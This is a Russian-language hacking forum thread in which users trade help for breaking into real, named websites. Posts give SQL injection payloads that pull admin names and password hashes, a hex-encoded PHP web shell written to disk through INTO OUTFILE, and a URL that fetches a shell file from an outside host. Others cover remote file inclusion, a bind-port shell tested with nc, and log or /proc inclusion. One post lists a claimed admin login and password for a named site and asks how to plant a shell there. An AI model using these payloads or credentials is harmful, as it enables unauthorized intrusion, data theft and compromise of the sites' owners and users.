Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    profile.php?mode=editprofile&cmd=GET%20http://site.com/sh.txt%20>%20sh.php

    получил смд
    пытаюсь так залить. шел в пхпбб2
    но файл не создаётся в чём трабла?
     
  2. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    если allow_url_include On , то залей include($_GET[lol]); , и profile.php?mode=editprofile&lol=http://site.com/sh.txt , или пробуй через аватарки, _http://forum.antichat.ru/showpost.php?p=198446&postcount=3
     
  3. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    вообщем есть скуля) пароли вытащил, но они мне оказались никчему(
    теперь пробую залить шелл, делаю запрос :
    -999+union+select+1,2,0x3c3f206563686f205c223c7072653e5c223b4073797374656d28245f4745545b5c22636d645c225d293b6563686f205c223c2f7072653e5c223b3f3e,4,5,6+INTO+OUTFILE+'/var/www/bans/z.php'--

    В ответ получаю ошибку:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/var/www/bans/z.php-- ORDER BY date ASC' at line 1

    пробовал убирать ковычки, дописывать ковычки, записывать путь в hex, ничего хорошего не вышло...
    опытные кулхацкеры подскажите ламеру чё делать :)
     
  4. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Для того чтобы залился нужно:

    1. magic_quotes_gpc = Off
    2. file_priv Y
    3. папка, доступная на запись

    в поле, где выводятся цифры, напиши 's' , если вывелось s - magic_quotes_gpc = off.

    делаешь запрос - ....from mysql.user where user= 'username' , username берёшь с того, что выводит user()

    ну и нужно найти диру, в которую шелл загрузишь

    _http://forum.antichat.ru/thread104591.html , см Вопрос №7
     
    2 people like this.
  5. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    путь не обрамлен ковычками, если ковычки слешируются try https://forum.antichat.ru/showpost.php?p=663815&postcount=39
    других вариантов на сегодняшний день не имеется
     
    1 person likes this.
  6. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Помогите парни залить шелл. Не могу понять куда можно... Если можно то поподробней
    http://www.heel.com.ua
    Админка внизу сайта

    логин: admin
    pass: shutnick
     
  7. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    вот у меня вопрос по поводу открытия RDP на машине с Win. Там стоит мускул 5. Неоднократно открыл через скул рдп на mssql но есть ли возможность через мускул?
     
  8. Komyak

    Komyak Banned

    Joined:
    14 Jan 2009
    Messages:
    202
    Likes Received:
    18
    Reputations:
    1
    Не могу больше ничего получить, не хватает думалки:
    Code:
    http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,concat_ws(0x3a,version(),user()),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables--
    
    Что из этого можно вытянуть?
    77-log:3g-administrator@localhost
     
  9. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    а там ничего толкового не получишь...

    Code:
    http://www.3g-peoplenet.com.ua/news/news_view.php?news_id=-9+union+select+1,2,3,4,5,6,7,concat_ws%280x3a,admin_id,admin_name%29,9,10,11,12+from+admin--
    колонки с пассами нет((
     
    1 person likes this.
  10. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    /var/www/heelezTH/heel.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/commands.php

    http://www.heel.com.ua/index.php?view=news&id=-487+UNION+SELECT+1,2,CONCAT%28Version%28%29,Database%28%29,User%28%29%29,4,5,6,7,8--%20+
     
  11. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    все зделаю и ок..а в конце не полуцается..

    а зацем ??

    http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62),0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword),3+from+g2_User
     
  12. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Таблица в другой базе данных
    http://www.kane.dk/index.php?menuID=2&pageID=-2+union+select+0,1,group_concat(char(60,98,114,62),0x3a,g_id,0x3a,g_userName,0x3a,g_hashedPassword),3+from+usr_web0_2.g2_User
     
    1 person likes this.
  13. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    spasibo ElteRUS
     
  14. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    делаю бинд порт на freebsd,проверяю
    Code:
    tcp        0      0 0.0.0.0:37695           0.0.0.0:*               LISTEN
    порт открылся,пробую приконектится
    Code:
    nc
    Cmd line: xx.xx.xx.xx 37695
    (UNKNOWN) [xx.xx.xx.xx] 37695 (?) : Connection timed out
    в чем может быть проблема ?
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    в фаерволе
     
  16. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    всем привет!
    у меня такой вопрос...
    ктонибудь пробовал заливать шелл,или хотябы выполнять какието команды через:
    ../../../../../../proc/self/fd/2 -я знаю што это логи апача, но там внутри содержание больше напоминает пхп сессии.
     
  17. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Это не логи а список процессов вроде,там нужно юзер агент подменять.
     
  18. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    а помойму это эррор_лог апачевский...
     
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    547
    Ну так посмотри что туда пишется, пиши и инклудь. В чём проблема-то?
    Если это error_log то возможно туда пишется Referer
     
  20. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23

    Да нафиг ты мне пути даешь? и Скулю. Это то все и сам могу. Мне интересно как шелл залить... И через этот менеджер только картинки и то ограниченные. А как пхп залить?
     
Thread Status:
Not open for further replies.